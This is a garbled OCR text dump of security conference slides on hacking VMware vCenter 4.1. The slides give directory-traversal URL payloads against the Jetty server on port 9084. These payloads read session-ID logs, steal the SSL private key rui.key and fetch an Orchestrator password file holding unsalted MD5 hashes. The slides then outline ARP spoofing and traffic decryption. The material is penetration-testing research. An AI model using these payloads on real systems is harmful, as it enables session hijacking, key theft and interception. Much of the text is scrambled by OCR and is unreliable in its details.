( J ER Scan Security Scanner for SAP Invest in security to secure investments How to hack VMware vCenter server in 60 seconds Alexander Minozhenko ^ ERPScan Security Scanner for SAP Pen-tester at Digital Security Researcher DEFCON RUSSIA DCG#7812 / Zeronights DCG * 7312 CTF Thanks for ideas and support to Alexey Sintsov ^ ERPScan Security Scanner for SAP What do pen-testers do? Scanning Fingerprinting Banner grabbing Play with passwords Find vulns. Exploit vulns. Escalate privs. Dig in Find ways to make attacks And e.t.c. } ERPScan Security Scanner for SAP Static — Source code review • regexp • formal methods • hand testing — Reverse Engineering • formal methods • hands... Dynamic — Fuzzing (bin/web) + Typical bugs for class + Reverse Engineering — Hand testing Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit- ^ ERPScan Security Scanner for SAP Tasks: pwn target 8) show most dang, vulns. show real attacks and what an attacker can do Time: Not much ) Ta rgets : Large number of targets, different types - Fuzzing (bin/web) [ + T ypical bugs for class I + Reverse Engineering - Hana testing 1 Architecture Analysis (Logic flaws) Use vuln. Database (CVE/exploit-db/etc Workstation Workstation Workstation ^ ERPScan Security Scanner for SAP VMware vCenter Server VMware vCenter Server is solution to manag VMware vSphere vSphere - virtualization operating system Manage VM VM VM VM VM VM VM VM VM VM VM VM VMware vSphere VMware vSphere VMware vSphere _J } ERPScan Security Scanner for SAP Vmware vCenter versi Services: — Update Manager — vCenter Orchestrator — Chargeback — Other Each services has web >n 4.1 update 1 VMware vCenter Server Automation Unlocks the power of VMware vSphere through proactive management Scalability Scalable and enten-ilble nruiugesnem platform ""^HJ-* Visibility Deep visibility Into every level of the virtual infrastructure server } ERPScan Security Scanner for SAP CVE-2009-1523 Directory traversal in Jetty web server http://target:9084/vci/download/health.xml/%3f/../../../../FILE Discovered by Claudio Criscione But Fixed in VMware Update Manager 4.1 update 1 :( } ERPScan Security Scanner for SAP • Directory traversal in Jetty web server • http://target:9084/vci/download/.%5C..%5C..%5C..%5C..%5C..% 5C..%5C..%5C..\FILE.EXT • Discovered by Alexey Sintsov • Metasploit module vmware_update_manager_traversal.rb by sinn3r ^ ERPScan Security Scanner for SAP Directory traversa What file to read? Claudio Criscione propose to read vpxd-profiler-* - /SessionStats/SessionPool/Session/ld='06B90BCB-A0A4-4B9C-B680- FB72656AlDCB7Username=,,FakeDomain\FakeUser7SoapSession/ld D45B176-63F3-4421-BBF0-FE1603E543F4'/Count/total 1 ='A • Contains logs of SOAP requests with session ID } ERPScan Security Scanner for SAP • "VASTO - collection of Metasploit modules meant to be used as a testing tool to perform penetration tests or security audit of virtualization solutions." http://vasto.nibblesec.org/ • vmware_updatemanager_traversal.rb Jetty path traversal • vmware_session_rider.rb Local proxy to ride stolen SOAPID sessions ^ ERPScan Security Scanner for SAP Fixed in version 4.1 update 1, contain ip - addresses &bwj] npaBKa Bma XypHaji 3aK/ia^KH MHcrpyMeHTbi Cnpaeita 9 : o X & ( http:/. 084/vc i/d own load s/.\. .\. .\. .\. .\. .\. .\. .\P ro g ra rn D ata\VM wa re\VM wa re Vi rtu a I C enter\Lo g s\.vpxd - p rof i I er-6 P CaMbie nony^napHbie HanajibHaji CTpaHHu,a /leHTa HOBOCTew » ■ http:/; m mm- ^..d - prof i I er-6.log X Error 404 - Not Found x Section for VMware VirtualCenter, pid=3564, version=4 . 1 . f build=build-345043 f option=Releese [2011-^-0 12:33:20.558 00560 info 'App']
/Alarir.Stats/Notif i cations Fending/ Count/total /DbStats/Fool/Cnx/InUse/total 1 /DbStats/Pool/Cnx/RetryCount /total /DbStats/Paal/Cnx/Size/tatal 10 / DbS tat s /Pool/Tm/CoiriQit Count/ total 5 6 /DbStats/Pool/Txn/ReplsyCount/total /DbStats/Paal/Txn/RallbackCaunt/ total / Db Stats/Fool /Txn/ S tint Count /tot al 555 /EventStats/PendingE vents /Count/ total 2 /Inventor yStats/ManagedEntityStats/Clusters/total 2 ^ ERPScan Security Scanner for SAP Make arp poisoning attack Spoof ssl certificate ^ ERPScan Security Scanner for SAP Administrators check SSL cert Se cy rity Wa rn in g |— Certificate Warnings An untrusted SSL certificate is installed on r, A'in-9iipbe5q5br r and secure communication cannot be guaranteed. Depending on your security policy r this issue might not represent a security concern You may need to install a trusted SSL certificate on your server to prevent this warning from appearing. Click Ignore to continue using the current SSL certificate View Certificate Ignore Cancel I - Install this certificate and do notdisplay any security warnings for'\win-9iipbe5q5br". } ERPScan Security Scanner for SAP • Steal ssl key via directory traversal http://target:9084/vci/downloads/.\.A-.\.A-.\.A-.\.ADocuments and SettingsXAII Users\Application Data\VMware\VMware VirtualCenter\SSL\rui.key • Make arp-spoofing • Decrypt traffic with stolen ssl key • What if arp-spoofing does not work? ^ ERPScan Security Scanner for SAP Vmware vCenter Orchestrator Vmwa re vCO - software for automate configuration and management nstall by default with vCenter • Have interesting file C:\Program files\VMware\lnfrastructure\Orchestrator \configuration\ietty\etc\passwd. properties ^ ERPScan Security Scanner for SAP Vmware vCenter Orchestrator Which contains md5 password without salt Could easy bruteforce using rainbow tables Ky dookie@inbotfu: Re yo... [j http;//defcon-njs5E3.ru/d,.. 1010,4.30i9084/vci/down... ■ \ Q f CO :9034/vci/downloads/,%5C..%5C..%5C%5C.%5C.%5C.%5C..%5CPfogr3nn% } ERPScan Security Scanner for SAP VMware vCenter Orchestrator Configuration General -T- Network ^fc LDAP Database 4 Server Certificate A Licenses A 1 4 Startup Options [ ^ Troubleshooting Plug-ins ^/^Mail (l.l.O) ifi^, SSH (1.0.2) r* J^J vCenter 4.0 (4.0.0) L A VMware Virtual Infrastructure Available: Host: Port: Path: User name : Password : User name : Password : Enabled n ew- virtu a l-center-h a st 142 ju Secure channel /sdk Specify the user credential for the admir vmware Specify which strategy will be used for it Share a unique session : Se v ; - - iciiucinig Lciiijjia lc , / m_u - 1111 f uagc^; piug.ii n piugn i . j 3|j ~~> i